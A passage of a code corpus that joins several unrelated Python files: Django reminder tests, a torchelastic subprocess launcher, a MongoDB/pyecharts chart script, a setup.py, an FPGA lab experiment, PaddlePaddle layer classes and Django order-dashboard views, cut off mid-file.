send_inactive_notice_data_clerks(router_obj=self.router)\n self.assertEqual(out_msgs.count(), 1)\n # set the date back so it triggers a reminder\n join_msg.date = self.now - timedelta(days=14)\n join_msg.save()\n send_inactive_notice_data_clerks(router_obj=self.router)\n out_msgs = Message.objects.filter(direction=\"O\", connection__contact=da)\n self.assertEqual(out_msgs.count(), 2)\n self.assertEqual(out_msgs[1].text, const.INACTIVE_CONTACT%{'days':14})\n\n def testExpectedEddReminder(self):\n Message.objects.all().delete()\n\n # this should send 1 msg with 1 count\n send_expected_deliveries(router_obj=self.router)\n msgs = Message.objects.all()\n self.assertEqual(msgs.count(), 1)\n self.assertEqual(msgs[0].text, const.EXPECTED_EDDS % {'edd_count': 1})\n\n def testExpectedEddReminderBeforeRange(self):\n Message.objects.all().delete()\n\n # this should send 0 as it's out of date range (less than)\n self.mom.edd = self.now - timedelta(days=1)\n self.mom.save()\n send_expected_deliveries(router_obj=self.router)\n msgs = Message.objects.all()\n self.assertEqual(msgs.count(), 0)\n\n def testExpectedEddReminderAfterRange(self):\n Message.objects.all().delete()\n\n # this should send 0 as it's out of date range (greater than)\n self.mom.edd = self.now + timedelta(days=8)\n self.mom.save()\n send_expected_deliveries(router_obj=self.router)\n msgs = Message.objects.all()\n self.assertEqual(msgs.count(), 0)\n\n def testExpectedEddNoInChargeReminder(self):\n Message.objects.all().delete()\n self.anton.types.clear()\n\n # this should do nothing because there's no incharge\n send_expected_deliveries(router_obj=self.router)\n self.assertEqual(Message.objects.all().count(), 0)\n","sub_path":"mwana/apps/smgl/tests/test_reminders.py","file_name":"test_reminders.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"232658870","text":"#!/usr/bin/env python3\n\n# Copyright (c) Facebook, Inc. and its affiliates.\n# All rights reserved.\n#\n# This source code is licensed under the BSD-style license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport ctypes\nimport os\nimport signal\nimport time\nfrom subprocess import CompletedProcess, TimeoutExpired\nfrom typing import Dict, List, Optional, Tuple, Union\n\nfrom torchelastic.multiprocessing.api import BaseProcessContext, ProcessGroupResult\nfrom torchelastic.multiprocessing.errors import ProcessFailure, get_error_file\nfrom torchelastic.multiprocessing.subprocess_handler import SubprocessHandler\n\n\ndef _pr_set_pdeathsig(sig=signal.SIGTERM):\n \"\"\"\n Sets PR_SET_PDEATHSIG to ensure a child process is\n terminated appropriately.\n\n See http://stackoverflow.com/questions/1884941/ for more information.\n For libc.so.6 read http://www.linux-m68k.org/faq/glibcinfo.html\n \"\"\"\n libc = ctypes.CDLL(\"libc.so.6\")\n PR_SET_PDEATHSIG = 1\n libc.prctl(PR_SET_PDEATHSIG, sig)\n\n\ndef _preexec_fn() -> None:\n _pr_set_pdeathsig()\n\n\nclass SubprocessParameters:\n \"\"\"\n Specifies parameters that are used for launching subprocesses.\n The class accepts arbitrary kwargs that will be directly passed to\n the ``subprocess.Popen`` constructor\n \"\"\"\n\n __slots__ = (\"args\", \"stdout\", \"stderr\", \"start_args\")\n\n def __init__(\n self,\n args: Tuple,\n stdout: Union[int, str, None] = None,\n stderr: Union[int, str, None] = None,\n **start_kwargs,\n ):\n r\"\"\"\n\n Arguments:\n args (Tuple[str]): Arguments that are used to launch the process\n stdout (Union[int, str, None]) The destination of the stdout stream. It can have one\n of three types: None - the default output, int - the fd destination, which also\n can be a special use case, e.g. subprocess.PIPE, str - the directory destination.\n If the value is str, the process will write the output into: {stdout}/{rank}/stdout.log\n stderr (Union[int, str, None]) The destination of the stderr stream. It can have one\n of three types: None - the default output, int - the fd destination, which also\n can be a special use case, e.g. subprocess.PIPE, str - the directory destination.\n If the value is str, the process will write the output into: {stdout}/{rank}/stderr.log\n \"\"\"\n self.args = args\n self.stdout = stdout\n self.stderr = stderr\n self.start_args = {}\n for (key, val) in start_kwargs.items():\n self.start_args[key] = val\n\n\nclass SubprocessContext(BaseProcessContext):\n \"\"\"\n Combines common operations that are executed on the same process group.\n \"\"\"\n\n def __init__(self, proc_list: List[SubprocessHandler], run_id: int = 0):\n self.processes = proc_list\n self.run_id = run_id\n\n def wait(self, timeout: Optional[float] = None) -> Optional[ProcessGroupResult]:\n r\"\"\"\n Method waits for process group completion in a loop. If all processes succeeded the list of\n ``subprocess.CompletedProcess`` will be returned. If processes are still running the method\n will return None.\n The method will throw the exception that is first got recorded.\n \"\"\"\n deadline, period = self._get_deadline_and_period(timeout)\n while deadline > time.time():\n if not self._any_alive():\n break\n failed_result = self._try_wait_or_get_result()\n if failed_result:\n self.terminate()\n return ProcessGroupResult(failure=failed_result)\n time.sleep(period)\n\n if self._any_alive():\n return None\n failed_result = self._try_wait_or_get_result()\n if failed_result:\n return ProcessGroupResult(failure=failed_result)\n results = {}\n for idx, proc in enumerate(self.processes):\n results[idx] = CompletedProcess(\n args=proc.args,\n returncode=proc.returncode,\n stdout=proc.stdout,\n stderr=proc.stderr,\n )\n return ProcessGroupResult(return_values=results)\n\n def pids(self) -> List[int]:\n return [int(proc.pid) for proc in self.processes]\n\n def _any_alive(self) -> bool:\n for proc in self.processes:\n if proc.is_alive():\n return True\n return False\n\n def _try_wait_or_get_result(self, timeout: float = 1.0) -> Optional[ProcessFailure]:\n failed_result = None\n for proc in self.processes:\n try:\n proc_failed_result = proc.wait_with_return(timeout, self.run_id)\n except TimeoutExpired:\n continue\n if not proc_failed_result:\n continue\n if (\n failed_result is None\n or failed_result.timestamp > proc_failed_result.timestamp\n ):\n failed_result = proc_failed_result\n return failed_result\n\n def terminate(self) -> None:\n for proc in self.processes:\n if proc.is_alive():\n proc.terminate()\n proc.wait()\n\n\ndef _resolve_std_stream(stream: Union[str, int, None], type: str, rank: int):\n if stream is None:\n return None\n elif isinstance(stream, int):\n return stream\n else:\n path = f\"{rank}/{type}.log\"\n stream_file = os.path.join(stream, path)\n stream_dir = stream_file[0 : stream_file.rfind(os.path.sep)]\n os.makedirs(stream_dir, exist_ok=True)\n return open(stream_file, \"w\")\n\n\ndef start_processes(\n params: List[SubprocessParameters], run_id: int = 0\n) -> SubprocessContext:\n processes = []\n for local_rank, proc_params in enumerate(params):\n stdout_stream = _resolve_std_stream(proc_params.stdout, \"stdout\", local_rank)\n stderr_stream = _resolve_std_stream(proc_params.stderr, \"stderr\", local_rank)\n popen_args = proc_params.start_args\n proc_args = {\n \"args\": proc_params.args,\n \"preexec_fn\": _preexec_fn,\n \"stdout\": stdout_stream,\n \"stderr\": stderr_stream,\n }\n popen_args.update(proc_args)\n if \"env\" not in popen_args:\n popen_args[\"env\"] = {}\n popen_args[\"env\"][\"TORCHELASTIC_ERROR_FILE\"] = get_error_file(\n local_rank, run_id\n )\n process = SubprocessHandler(local_rank, **popen_args)\n processes.append(process)\n return SubprocessContext(processes, run_id)\n","sub_path":"torchelastic/multiprocessing/sp.py","file_name":"sp.py","file_ext":"py","file_size_in_byte":6628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"172900086","text":"#encoding:utf-8\r\nimport random\r\nfrom pyecharts import Bar\r\nfrom pymongo import MongoClient\r\n\r\n\r\nconn = MongoClient('127.0.0.1',27017) #创建于MongoDB的连接\r\ndb = conn.anjuke #选择数据库\r\ncollection=db.AnjukeItem #选择数据库下的集合\r\nall = []\r\nres = collection.aggregate([\r\n {'$group':{'_id':'$city',\r\n 'count':{'$sum':1}}},\r\n {'$sort':{'count':-1}},])\r\nconn.close()\r\n#上面是mongodb聚合统计的语句\r\n#$group:按照给定表达式组合结果,这里的_id字段表示你要基于哪个字段来进行分组,这里的$city就表示要基于city字段来进行分组\r\n#下面的count字段的值$sum: 1表示的是获取--满足city字段相同的这一组的数量--乘以后面给定的值(本例为1,那么就是同组的数量)。\r\n#$sort:按照给定的字段排序结果,即按计算好的count排序,-1为降序来排列\r\n\r\nfor i in res:\r\n print(i)\r\n #{'_id': '成都', 'count': 2074}\r\n all.append((i['_id'].strip(),i['count']))\r\n\r\nattr = [i[0] for i in all[:30] ] #取前三十城市的名字\r\nv1 = [i[1] for i in all[:30]] #取前三十城市的值\r\nprint(attr)\r\nbar = Bar('新房分布柱状图') #柱状图\r\nbar.add('各城市新楼盘数',attr,v1,is_label_show=True,is_datazoom_show=True,xaxis_rotate=65, label_color=['#87CEEB',])\r\n#attr 下面的城市名\r\n#v1 数值\r\n#is_label_show -> bool 是否正常显示标签,默认不显示。即各柱上的数字\r\n#is_datazoom_show -> bool 是否使用区域缩放组件,默认为 False\r\n#xaxis_rotate -> int x 轴刻度标签旋转的角度,默认为 0,即不旋转。旋转的角度从 -90 度到 90 度。\r\n#label_color 柱的颜色\r\nbar.render('bar.html')\r\n","sub_path":"anjuke-paint/bar1.py","file_name":"bar1.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"594336212","text":"#!/usr/bin/env python\n\nimport re\nimport ast\nfrom setuptools import setup\n\n_version_re = re.compile(r'__version__\\s+=\\s+(.*)')\n\nwith open('shellwhat/__init__.py', 'rb') as f:\n version = str(ast.literal_eval(_version_re.search(\n f.read().decode('utf-8')).group(1)))\n\nsetup(\n\tname='shellwhat',\n\tversion=version,\n\tpackages=['shellwhat'],\n\tinstall_requires=['protowhat>=0.5.0'],\n description = 'Submission correctness tests for shell languages',\n author = 'Michael Chow',\n author_email = 'michael@datacamp.com',\n url = 'https://github.com/datacamp/shellwhat')\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"377417887","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 22 13:37:53 2021\n\n@author: qulab\n\"\"\"\nfrom init_script import *\nimport numpy as np\n\nclass state_prep_fock_reward_fpga(FPGAExperiment):\n \"\"\" State preparation with Fock reward.\"\"\"\n loop_delay = FloatParameter(4e6)\n batch_size = IntParameter(10)\n opt_file = StringParameter('')\n fock = IntParameter(4)\n\n def sequence(self):\n # load pulse sequences and phase space points from file\n params = np.load(self.opt_file, allow_pickle=True)\n self.qubit_pulses = [(p.real, p.imag) for p in params['qubit_pulses']]\n self.cavity_pulses = [(p.real, p.imag) for p in params['cavity_pulses']]\n\n detune = - self.fock * cavity.chi\n self.qubit = qubit_ef\n\n @subroutine\n def reward_circuit():\n readout(m1='se')\n sync()\n self.qubit.flip(selective=True, detune=detune)\n sync()\n readout(m2='se')\n delay(self.loop_delay)\n\n @subroutine\n def init_circuit():\n readout(m0='se')\n\n def control_circuit(i):\n sync()\n qubit.array_pulse(*self.qubit_pulses[i])\n cavity.array_pulse(*self.cavity_pulses[i])\n sync()\n\n for i in range(self.batch_size):\n # initialize, run control circuit and collect reward\n init_circuit()\n control_circuit(i)\n reward_circuit()\n","sub_path":"rl/state_prep_fock_reward_fpga.py","file_name":"state_prep_fock_reward_fpga.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"638533408","text":"# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\n\nfrom six.moves import reduce\n\nfrom .. import core\nfrom ..layers import utils\nfrom . import layers\nfrom ..framework import Variable, OpProtoHolder\nfrom ..param_attr import ParamAttr\nfrom ..initializer import Normal, Constant\n\n__all__ = [\n 'Conv2D',\n 'Pool2D',\n 'FC',\n]\n\n\nclass Conv2D(layers.Layer):\n def __init__(self,\n num_channels,\n num_filters,\n filter_size,\n stride=1,\n padding=0,\n dilation=1,\n groups=None,\n use_cudnn=True,\n act=None,\n param_attr=None,\n bias_attr=None,\n name=None,\n dtype=core.VarDesc.VarType.FP32):\n assert param_attr is not False, \"param_attr should not be False here.\"\n super(Conv2D, self).__init__(name=name, dtype=dtype)\n\n from ..layer_helper import LayerHelper\n self._helper = LayerHelper(\n type(self).__name__,\n param_attr=param_attr,\n bias_attr=bias_attr,\n dtype=dtype,\n name=name)\n\n self._groups = groups\n self._stride = utils.convert_to_list(stride, 2, 'stride')\n self._padding = utils.convert_to_list(padding, 2, 'padding')\n self._dilation = utils.convert_to_list(dilation, 2, 'dilation')\n if not isinstance(use_cudnn, bool):\n raise ValueError(\"use_cudnn should be True or False\")\n self._use_cudnn = use_cudnn\n self._num_channels = num_channels\n if (self._num_channels == self._groups and\n num_filters % self._num_channels == 0 and not self._use_cudnn):\n self._l_type = 'depthwise_conv2d'\n else:\n self._l_type = 'conv2d'\n\n if groups is None:\n num_filter_channels = num_channels\n else:\n if num_channels % groups != 0:\n raise ValueError(\"num_channels must be divisible by groups.\")\n num_filter_channels = num_channels // groups\n filter_size = utils.convert_to_list(filter_size, 2, 'filter_size')\n filter_shape = [num_filters, int(num_filter_channels)] + filter_size\n\n def _get_default_param_initializer():\n filter_elem_num = filter_size[0] * filter_size[1] * num_channels\n std = (2.0 / filter_elem_num)**0.5\n return Normal(0.0, std, 0)\n\n self._filter_param = self._helper.create_parameter(\n attr=self._helper.param_attr,\n shape=filter_shape,\n dtype=self._dtype,\n default_initializer=_get_default_param_initializer())\n\n if self._use_cudnn:\n self._helper.create_variable(\n name=\"kCUDNNFwdAlgoCache\",\n persistable=True,\n type=core.VarDesc.VarType.RAW)\n self._helper.create_variable(\n name=\"kCUDNNBwdDataAlgoCache\",\n persistable=True,\n type=core.VarDesc.VarType.RAW)\n self._helper.create_variable(\n name=\"kCUDNNBwdFilterAlgoCache\",\n persistable=True,\n type=core.VarDesc.VarType.RAW)\n\n self._bias_param = self._helper.create_parameter(\n attr=self._helper.bias_attr,\n shape=[num_filters],\n dtype=self._dtype,\n is_bias=True)\n\n def forward(self, input):\n pre_bias = self._helper.create_variable_for_type_inference(\n dtype=self._dtype)\n\n self._helper.append_op(\n type=self._l_type,\n inputs={\n 'Input': input,\n 'Filter': self._filter_param,\n },\n outputs={\"Output\": pre_bias},\n attrs={\n 'strides': self._stride,\n 'paddings': self._padding,\n 'dilations': self._dilation,\n 'groups': self._groups,\n 'use_cudnn': self._use_cudnn,\n 'use_mkldnn': False,\n })\n\n pre_act = self._helper.create_variable_for_type_inference(\n dtype=self._dtype)\n\n self._helper.append_op(\n type='elementwise_add',\n inputs={'X': [pre_bias],\n 'Y': [self._bias_param]},\n outputs={'Out': [pre_act]},\n attrs={'axis': 1})\n\n return self._helper.append_activation(pre_act)\n\n\nclass Pool2D(layers.Layer):\n def __init__(self,\n pool_size=-1,\n pool_type=\"max\",\n pool_stride=1,\n pool_padding=0,\n global_pooling=False,\n use_cudnn=True,\n ceil_mode=False,\n exclusive=True,\n name=None,\n dtype=core.VarDesc.VarType.FP32):\n if pool_type not in [\"max\", \"avg\"]:\n raise ValueError(\n \"Unknown pool_type: '%s'. It can only be 'max' or 'avg'.\",\n str(pool_type))\n\n if global_pooling is False and pool_size == -1:\n raise ValueError(\n \"When the global_pooling is False, pool_size must be passed \"\n \"and be a valid value. Received pool_size: \" + str(pool_size))\n\n if not isinstance(use_cudnn, bool):\n raise ValueError(\"use_cudnn should be True or False\")\n\n super(Pool2D, self).__init__(name=name, dtype=dtype)\n\n from ..layer_helper import LayerHelper\n self._helper = LayerHelper(type(self).__name__, dtype=dtype, name=name)\n\n self._pool_type = pool_type\n self._pool_size = utils.convert_to_list(pool_size, 2, 'pool_size')\n self._pool_padding = utils.convert_to_list(pool_padding, 2,\n 'pool_padding')\n self._pool_stride = utils.convert_to_list(pool_stride, 2, 'pool_stride')\n self._global_pooling = global_pooling\n self._use_cudnn = use_cudnn\n self._ceil_mode = ceil_mode\n self._exclusive = exclusive\n self._l_type = 'pool2d'\n\n def forward(self, input):\n pool_out = self._helper.create_variable_for_type_inference(self._dtype)\n\n self._helper.append_op(\n type=self._l_type,\n inputs={\"X\": input},\n outputs={\"Out\": pool_out},\n attrs={\n \"pooling_type\": self._pool_type,\n \"ksize\": self._pool_size,\n \"global_pooling\": self._global_pooling,\n \"strides\": self._pool_stride,\n \"paddings\": self._pool_padding,\n \"use_cudnn\": self._use_cudnn,\n \"ceil_mode\": self._ceil_mode,\n \"use_mkldnn\": False,\n \"exclusive\": self._exclusive,\n })\n return pool_out\n\n\nclass FC(layers.Layer):\n def __init__(self,\n size,\n param_attr=None,\n num_flatten_dims=1,\n dtype=core.VarDesc.VarType.FP32):\n super(FC, self).__init__()\n self._size = size\n self._num_flatten_dims = num_flatten_dims\n self._dtype = dtype\n from ..layer_helper import LayerHelper\n self._helper = LayerHelper('FC', param_attr=param_attr)\n\n def _build_once(self, input):\n input_shape = input.shape\n param_shape = [\n reduce(lambda a, b: a * b, input_shape[self._num_flatten_dims:], 1)\n ] + [self._size]\n self._w = self._helper.create_parameter(\n attr=self._helper.param_attr,\n shape=param_shape,\n dtype=self._dtype,\n is_bias=False)\n\n def forward(self, input):\n tmp = self._helper.create_variable_for_type_inference(self._dtype)\n self._helper.append_op(\n type=\"mul\",\n inputs={\"X\": input,\n \"Y\": self._w},\n outputs={\"Out\": tmp},\n attrs={\n \"x_num_col_dims\": self._num_flatten_dims,\n \"y_num_col_dims\": 1\n })\n\n out = self._helper.create_variable_for_type_inference(self._dtype)\n self._helper.append_op(\n type=\"sum\",\n inputs={\"X\": [tmp]},\n outputs={\"Out\": out},\n attrs={\"use_mkldnn\": False})\n return out\n","sub_path":"python/paddle/fluid/imperative/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":8856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"350072831","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.http import HttpResponseRedirect, HttpResponse, JsonResponse\nfrom django.shortcuts import render\nfrom .models import *\nfrom datetime import date\nfrom django.db.models import Sum, Avg, Count\nfrom collections import Counter\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.decorators import login_required\nimport json, datetime\nimport operator # aj added\n\n\n@login_required(login_url='/login')\ndef dashboard(request):\n today = date.today()\n all_notes = Note.objects.order_by('-id')[:5]\n all_orders = CustomerOrder.objects.all()\n all_orders_short = CustomerOrder.objects.all()[:15]\n active_orders = CustomerOrder.objects.filter(delivery_date__gte=today)\n num_active_orders = len(active_orders)\n sum_price = CustomerOrder.objects.filter(delivery_date__gte=today).aggregate(Sum('total_price'))\n avg_price = CustomerOrder.objects.all().aggregate(Avg('total_price'))\n \n active_orders_oc = CustomerOrder.objects.filter(shipping_method__contains=\"OC\").filter(delivery_date__gte=today)\n num_active_orders_oc = len(active_orders_oc)\n sum_price_oc = CustomerOrder.objects.filter(delivery_date__gte=today).filter(shipping_method__contains=\"OC\").aggregate(Sum('total_price'))\n avg_price_oc = CustomerOrder.objects.all().filter(delivery_date__gte=today).filter(shipping_method__contains=\"OC\").aggregate(Avg('total_price'))\n \n active_orders_la = CustomerOrder.objects.filter(shipping_method__contains=\"LA\").filter(delivery_date__gte=today)\n num_active_orders_la = len(active_orders_la)\n sum_price_la = CustomerOrder.objects.filter(delivery_date__gte=today).filter(shipping_method__contains=\"LA\").aggregate(Sum('total_price'))\n avg_price_la = CustomerOrder.objects.filter(delivery_date__gte=today).filter(shipping_method__contains=\"LA\").aggregate(Avg('total_price'))\n \n bestseller = Product.objects.all().order_by('quantity').last()\n worstseller = Product.objects.all().order_by('-quantity').last()\n bestseller_n = {'best_name': bestseller.name} \n \n allp = Product.objects.all()\n allp_count = allp.count()\n allpu = Product.objects.all().annotate(Count('pk'))\n \n \n dist_products = Product.objects.values('name').distinct()\n # dist_product_qty = Product.objects.filter(name__contains=\"Ham & Cheese Omelette w/ Farro Salad\").aggregate(Sum('quantity'))\n \n # create an empty dictionary\n best_sellers = {} \n # for loop, prod is line variable, dist_products is from above variable dist_products = Products.objects.values('name').distinct()\n for prod in dist_products: \n # for each loop, sum the quantity of the name of each line (prod)\n quantity = Product.objects.filter(name__contains=prod['name']).aggregate(Sum('quantity')) \n # add product name as key and sum of quantity of product as value to dictionary \"best_sellers\"\n best_sellers[prod['name']] = quantity['quantity__sum'] \n\n # set variable sorted_sellers to best_seller.... \n sorted_sellers = sorted(best_sellers.items(), key=operator.itemgetter(1))\n sorted_sellers.reverse() # aj added\n \n worst_sellers = {}\n for prod1 in dist_products:\n quantity1 = Product.objects.filter(name__contains=prod1['name']).aggregate(Sum('quantity'))\n worst_sellers[prod1['name']] = quantity1['quantity__sum']\n sorted_worst_sellers = sorted(worst_sellers.items(), key=operator.itemgetter(1))\n sorted_worst_sellers\n \n best_seller1 = Product.objects.values('name').annotate(total=Count('quantity')).order_by('-total')\n worst_seller1 = Product.objects.values('name').annotate(total=Count('quantity')).order_by('total')\n \n best_seller_5 = Product.objects.values('name').annotate(total=Count('quantity')).order_by('-total')\n \n beginning = datetime.date(2017,6,10)\n end = datetime.date(2017,6,17)\n product_date = Product.objects.filter(customer_order__delivery_date__gte=beginning,customer_order__delivery_date__lte=end).values('name').annotate(total=Sum('quantity')).order_by('-total')\n \n \n \n context = {\n \"all_notes\":all_notes, \n \"all_orders\":all_orders, \n \"today\":today,\n \"active_orders\":active_orders,\n \"num_active_orders\":num_active_orders,\n \"sum_price\":sum_price,\n \"avg_price\":avg_price,\n \"active_orders_oc\":active_orders_oc,\n \"num_active_orders_oc\":num_active_orders_oc,\n \"sum_price_oc\":sum_price_oc,\n \"active_orders_la\":active_orders_la,\n \"num_active_orders_la\":num_active_orders_la,\n \"avg_price_oc\":avg_price_oc,\n \"sum_price_la\":sum_price_la,\n \"avg_price_la\":avg_price_la,\n \"bestseller_n\":bestseller_n,\n \"bestseller\":bestseller,\n \"worstseller\":worstseller,\n \"all_orders_short\":all_orders_short,\n \"allp_count\":allp_count,\n \"allpu\":allpu,\n \"dist_products\":dist_products,\n \"quantity\":quantity,\n \"items\": Product.objects.values('name').distinct(),\n \"best_sellers\":best_sellers,\n \"sorted_sellers\": sorted_sellers, # aj added\n \"best_seller1\":best_seller1,\n \"worst_seller1\":worst_seller1,\n \"worst_sellers\":worst_sellers,\n \"sorted_worst_sellers\":sorted_worst_sellers,\n \"best_seller_5\":best_seller_5,\n \"product_date\":product_date,\n \"beginning\":beginning,\n \"end\":end,\n \n\n }\n \n return render(request, \"orderdisplay/dashboard.html\", context)\n\ndef best_seller(request):\n\n all_products = Product.objects.all()\n all_products_5 = Product.objects.all()[:5]\n all_products_distinct = Product.objects.values('name').distinct()\n \n \n context = {\n \"all_products\":all_products,\n \"items\":Product.objects.values('name').distinct(),\n \"best_seller\":best_seller,\n \"all_products_5\":all_products_5,\n \"all_products_distinct\":all_products_distinct,\n \"best_seller\":best_seller,\n \n }\n return render(request, \"orderdisplay/best_seller.html\", context)\n \n\ndef features(request):\n context = { }\n return render(request, \"orderdisplay/features.html\", context)\n\ndef features2(request):\n context = { }\n return render(request, \"orderdisplay/features2.html\", context)\n \ndef live_orders(request):\n context = { }\n return render(request, \"orderdisplay/live_orders.html\", context)\n\ndef live_orders2(request):\n today = date.today()\n oc_future_orders = CustomerOrder.objects.filter(delivery_date__gte=today, shipping_method__contains=\"Overnight\")\n la_future_orders = CustomerOrder.objects.filter(delivery_date__gte=today, shipping_method__contains=\"LA\")\n all_orders = CustomerOrder.objects.all()\n future_orders = CustomerOrder.objects.filter(delivery_date__gte=today)\n context = { \n \"all_orders\":all_orders, \n \"today\":today, \n \"future_orders\":future_orders,\n \"oc_future_orders\":oc_future_orders,\n \"la_future_orders\":la_future_orders,\n }\n return render(request, \"orderdisplay/live_orders2.html\", context)\n\ndef live_orders_oc(request):\n today = date.today()\n oc_future_orders = CustomerOrder.objects.filter(\n delivery_date__gte=today, shipping_method__contains=\"LA\")\n all_orders = CustomerOrder.objects.all()\n future_orders = CustomerOrder.objects.filter(delivery_date__gte=today)\n paginator = Paginator(future_orders, 25)\n page = request.GET.get('page')\n try:\n orders = paginator.page(page)\n except PageNotAnInteger:\n orders = paginator.page(1)\n except EmptyPage:\n orders = paginator.page(paginator.num_pages)\n context = { \n \"all_orders\":all_orders, \n \"today\":today, \n \"future_orders\":future_orders,\n \"oc_future_orders\":oc_future_orders,\n \"orders\":orders,\n }\n return render(request, \"orderdisplay/live_orders_oc.html\", context)\n\ndef live_orders_la(request):\n today = date.today()\n la_future_orders = CustomerOrder.objects.filter(\n delivery_date__gte=today, shipping_method__contains=\"LA\")\n all_orders = CustomerOrder.objects.all()\n future_orders = CustomerOrder.objects.filter(delivery_date__gte=today)\n context = { \n \"all_orders\":all_orders, \n \"today\":today, \n \"future_orders\":future_orders,\n \"la_future_orders\":la_future_orders,\n }\n return render(request, \"orderdisplay/live_orders_la.html\", context)\n\ndef note_save(request):\n note_save = request.POST[\"note_save\"]\n note_details = request.POST[\"note_detail_save\"]\n note = Note(note_text=note_save, note_detail=note_details)\n note.save()\n \n return HttpResponseRedirect('manager_post')\n \ndef note_details(request, note_id):\n note = Note.objects.get(id=note_id)\n context = { \"note\":note }\n return render(request, \"orderdisplay/note_details.html\", context) \n \ndef datatables(request):\n today = date.today()\n oc_future_orders = CustomerOrder.objects.filter(\n delivery_date__gte=today, shipping_method__contains=\"OC\")\n all_orders = CustomerOrder.objects.all()\n future_orders = CustomerOrder.objects.filter(delivery_date__gte=today)\n paginator = Paginator(future_orders, 25)\n page = request.GET.get('page')\n try:\n orders = paginator.page(page)\n except PageNotAnInteger:\n orders = paginator.page(1)\n except EmptyPage:\n orders = paginator.page(paginator.num_pages)\n context = { \n \"all_orders\":all_orders, \n \"today\":today, \n \"future_orders\":future_orders,\n \"oc_future_orders\":oc_future_orders,\n \"orders\":orders,\n }\n return render(request, \"orderdisplay/datatables.html\", context)\n \ndef datatables_products(request):\n all_products = Product.objects.all()[:200]\n\n context = {\n \"all_products\":all_products\n }\n \n\n return render(request, \"orderdisplay/datatables_products.html\", context)\n\ndef history(request):\n all_orders = CustomerOrder.objects.all()\n context = { \"all_orders\":all_orders }\n return render(request, \"orderdisplay/history.html\", context)\n \ndef register(request):\n return render(request, \"orderdisplay/register.html\")\n \ndef register_authenticate(request): \n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n password = request.POST[\"password\"]\n user = User.objects.create_user(username=username, email=email, password=password)\n \n if user is not None:\n user = authenticate(username=username, password=password)\n login(request, user)\n return HttpResponseRedirect(reverse('orderdisplay:dashboard')) \n else:\n return HttpResponseRedirect(reverse('orderdisplay:register')) \n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse('orderdisplay:dashboard')) \n \ndef map(request):\n all_orders = CustomerOrder.objects.all()\n all_orders5 = CustomerOrder.objects.all()[:5]\n context = { \"all_orders\":all_orders, \"all_orders5\":all_orders5 }\n return render(request, \"orderdisplay/map.html\", context)\n \ndef map2(request):\n points = CustomerOrder.objects.all()[:5]\n context = { \"points\":points }\n return render(request, \"orderdisplay/map2.html\", context)\n \ndef authenticate_user(request):\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(username=username, password=password)\n #return HttpResponse(user)\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse('orderdisplay:dashboard')) \n else:\n return HttpResponseRedirect(reverse('orderdisplay:login_invalid_view')) \n \ndef login_view(request):\n return render(request, 'orderdisplay/login.html')\n \ndef profile(request, user_id):\n user = User.objects.get(id=user_id)\n context = { \"user\":user }\n return render(request, 'orderdisplay/profile.html', context)\n \ndef login_invalid_view(request):\n return render(request, 'orderdisplay/login_invalid.html')\n \ndef js(request):\n return render(request, 'orderdisplay/js.html')\n \ndef test_json(request):\n theme_parks = [\"disneyland\", \"knotts\", \"universal\", \"magic mountain\"]\n days = [\"sunday\", \"saturday\"] # Goal: send days to JS\n theme_json = json.dumps(theme_parks) # serialize list to JSON\n return JsonResponse(theme_json, safe=False) # send JSON string in response\n \ndef price_chart(request):\n return HttpResponse(\"price chart page\")\n \ndef notifications(request):\n all_notes = Note.objects.order_by('-id')\n \n context = { \"all_notes\":all_notes }\n return render(request, 'orderdisplay/notifications.html', context)\n\ndef manager_post(request):\n all_notes = Note.objects.order_by('-id')[:5]\n context = { \"all_notes\":all_notes }\n return render(request, 'orderdisplay/manager_post.html', context)\n \ndef test(request):\n\n offset = [0, 7, 14, 21, 28]\n ordersum_list = []\n \n startdate = datetime.datetime.today()\n return HttpResponse(startdate)\n \ndef change(request):\n change_log = Change.objects.all().order_by('-created_at')\n context = { \"change_log\":change_log, }\n return render(request, 'orderdisplay/change.html', context)\n \ndef change_save(request):\n title = request.POST[\"title\"]\n body = request.POST[\"body\"]\n new = Change(title = title, body = body)\n new.save()\n return HttpResponseRedirect(\"/change\")\n \n# Hidden page with active edit links \ndef change_edit(request):\n change_log = Change.objects.all()\n context = { \"change_log\":change_log, } \n return render(request, 'orderdisplay/change_edit.html', context)\n \n# Gets change log entry and deletes \ndef change_delete(request, task_id):\n task = Change.objects.get(id=task_id)\n task.delete()\n return HttpResponseRedirect(\"/change_edit\")\n \ndef customer(request):\n all_customers = Customer.objects.all()\n context = { \"all_customers\":all_customers }\n return render(request, \"orderdisplay/customer.html\", context)\n \ndef morris(request):\n context = {}\n return render(request, 